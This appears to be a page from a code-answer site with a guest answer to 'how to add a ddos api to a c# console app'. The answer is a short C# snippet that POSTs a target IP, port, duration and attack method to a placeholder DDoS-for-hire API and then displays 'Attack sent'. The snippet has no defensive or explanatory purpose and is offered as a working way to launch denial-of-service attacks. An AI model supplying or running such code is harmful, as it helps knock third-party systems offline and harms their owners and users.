Answers for "how to add a ddos api to a c# console app"

C#
0

how to add a ddos api to a c# console app

add strings: IP, PORT, TIME, METHOD then input this
  
  
  var resp = wc.UploadString("https://yourapi", "POST",
                   $"{{ \"target\":\"{target}\", \"port\": {port}, \"duration\": {time}, \"method\": \"{method}\"}}");
                MessageBox.Show($"Attack sent to {target} using port {port} for {time} Second/s with {method} method.");
Posted by: Guest on February-04-2021

C# Answers by Framework

Browse Popular Code Answers by Language